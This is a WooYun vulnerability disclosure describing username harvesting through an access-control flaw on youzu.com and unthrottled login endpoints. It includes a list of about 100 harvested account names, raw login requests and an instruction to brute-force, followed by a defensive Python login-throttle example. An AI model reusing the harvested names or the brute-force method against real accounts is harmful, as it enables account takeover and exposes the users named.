WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2014-12-26: Details reported to the vendor, awaiting vendor handling
2014-12-29: Vendor confirmed; details disclosed to the vendor only
2015-01-08: Details disclosed to core white hats and relevant domain experts
2015-01-18: Details disclosed to regular white hats
2015-01-28: Details disclosed to intern white hats
2015-02-09: Details disclosed to the public
First, a horizontal privilege (insecure direct object reference) vulnerability is used to harvest usernames; the first 100 are shown as an example.
zzsxqb1zuolin1999zqdyyzonghengdazoe289zl3231572zhyp44058zhs117476741zhoumiloveqzhou20112011zhongwewu8zhf183zhaoguchuanzhaobo1033yyy2811098yyf45671yxy20021201yuy810615yulin688yujingaddyszyiykf8866yhsjkdyfx780916ye1069ydzsdahaoydx906yansen000xxw654xx13171846966xuyanbo159xushen163xujinhua06xujianzhong136xuelei715506xuanlv1111xtz77xsotq94157xmjjyr12345xinxingyeyaxinhuyanxican520xiaolu11wznm790319wym0308wyggamewupeng1129wssddx1234wogannimayx112winscom2011windy2ccwhy791120wddwwddwwddw
Neither of the two login endpoints below limits the number of login attempts.
GET /site/ulogin?username=usera111&password=pass11&t=0.7611347562824168 HTTP/1.1
Host: bbs.youzu.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://bbs.youzu.com/Site/
Cookie: __utma=166915638.999324100.1419312277.1419400811.1419479000.3; __utmz=166915638.1419312277.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_f61970e1ce8b3758b866572e28e07fba=1419312278,1419400279,1419478999; Hm_lpvt_f61970e1ce8b3758b866572e28e07fba=1419479536; __utmb=166915638.3.9.1419479555766; __utmc=166915638
Connection: keep-alive

POST /login.php HTTP/1.1
Host: passport.youzu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: */*
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://passport.youzu.com/login.php?rurl=http%3A%2F%2Fpassport.youzu.com%2F
Content-Length: 94
Cookie: Hm_lvt_f61970e1ce8b3758b866572e28e07fba=1419476489; Hm_lpvt_f61970e1ce8b3758b866572e28e07fba=1419480093;__utma=166915638.2078507509.1419476491.1419476491.1419480093.2; __utmc=166915638; __utmz=166915638.1419476491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=166915638.1.10.1419480093; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

LoginForm%5Busername%5D=aaxxx&LoginForm%5Bpassword%5D=11111&LoginForm%5BrememberMe%5D=0
Brute-force it.
The hit rate is very high.
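The missing control on both endpoints is a per-source and per-account attempt limit. The following is an added example, not code from the report or from the vendor: a sliding-window login throttle replayed over a constructed authentication log (the IPs, usernames and timestamps are made up; the two endpoint paths are the ones shown above). It demonstrates why a harvested list of valid usernames raises the hit rate (one source spraying many accounts) and how a limit keyed on the client address catches that pattern even when each account sees only one failed attempt.

```python
import re
from collections import defaultdict, deque

# Constructed sample log (not from the report). One authentication attempt per line:
# <epoch seconds> <client ip> <endpoint> <username> <OK|FAIL>
SAMPLE_LOG = """\
1000 203.0.113.7 /site/ulogin acct01 FAIL
1001 203.0.113.7 /site/ulogin acct02 FAIL
1002 203.0.113.7 /login.php acct03 FAIL
1003 198.51.100.4 /login.php alice FAIL
1004 198.51.100.4 /login.php alice OK
1005 203.0.113.7 /site/ulogin acct04 FAIL
1006 203.0.113.7 /login.php acct05 FAIL
1007 203.0.113.7 /site/ulogin acct06 OK
1008 203.0.113.7 /login.php acct07 FAIL
1400 203.0.113.7 /site/ulogin acct01 FAIL
"""

LOG_RE = re.compile(r"^(\d+) (\S+) (\S+) (\S+) (OK|FAIL)$")


class LoginThrottle:
    """Sliding-window failure counter keyed on client IP and on username.

    An attempt is allowed only while both counters are under their limit.
    Rejected attempts are counted as failures too, so a client that keeps
    hammering the endpoint stays locked out instead of being freed the moment
    the oldest failure ages out of the window.
    """

    def __init__(self, max_ip_failures=5, max_user_failures=3, window=300):
        self.max_ip_failures = max_ip_failures
        self.max_user_failures = max_user_failures
        self.window = window  # seconds
        self.ip_failures = defaultdict(deque)
        self.user_failures = defaultdict(deque)

    def _prune(self, dq, now):
        # Drop failure timestamps that have fallen out of the window.
        cutoff = now - self.window
        while dq and dq[0] <= cutoff:
            dq.popleft()

    def check(self, ip, username, now, success):
        """Return True if the attempt may proceed, False if it is throttled."""
        ip_dq = self.ip_failures[ip]
        user_dq = self.user_failures[username]
        self._prune(ip_dq, now)
        self._prune(user_dq, now)
        allowed = (len(ip_dq) < self.max_ip_failures
                   and len(user_dq) < self.max_user_failures)
        if allowed and success:
            user_dq.clear()  # a genuine login resets that account's counter
        else:
            # Failed or rejected attempt: charge it to both the source and the account.
            ip_dq.append(now)
            user_dq.append(now)
        return allowed


def replay(log_text, throttle=None):
    """Run each log line through the throttle; return (ts, ip, username, verdict) tuples."""
    throttle = throttle or LoginThrottle()
    verdicts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash on them
        ts, ip, _endpoint, user, result = m.groups()
        ok = throttle.check(ip, user, int(ts), result == "OK")
        verdicts.append((int(ts), ip, user, "allowed" if ok else "blocked"))
    return verdicts


def blocked_sources(verdicts):
    """Set of client IPs that hit the throttle at least once."""
    return {ip for _, ip, _, v in verdicts if v == "blocked"}


if __name__ == "__main__":
    for ts, ip, user, verdict in replay(SAMPLE_LOG):
        print(f"{ts} {ip:<13} {user:<7} {verdict}")
    print("throttled sources:", blocked_sources(replay(SAMPLE_LOG)))
```

In the replay, the spraying source 203.0.113.7 is blocked on its sixth attempt in the window, including the one that would have guessed correctly, while the legitimate user on 198.51.100.4 who mistypes once and then logs in is never touched. After the window expires the counter resets, which is the usual trade-off between lockout and denial-of-service against real users; in production the same counters would live in a shared store rather than in process memory.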
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2014-12-29 16:39
We will make the corrections and adjustments promptly, thank you.
None yet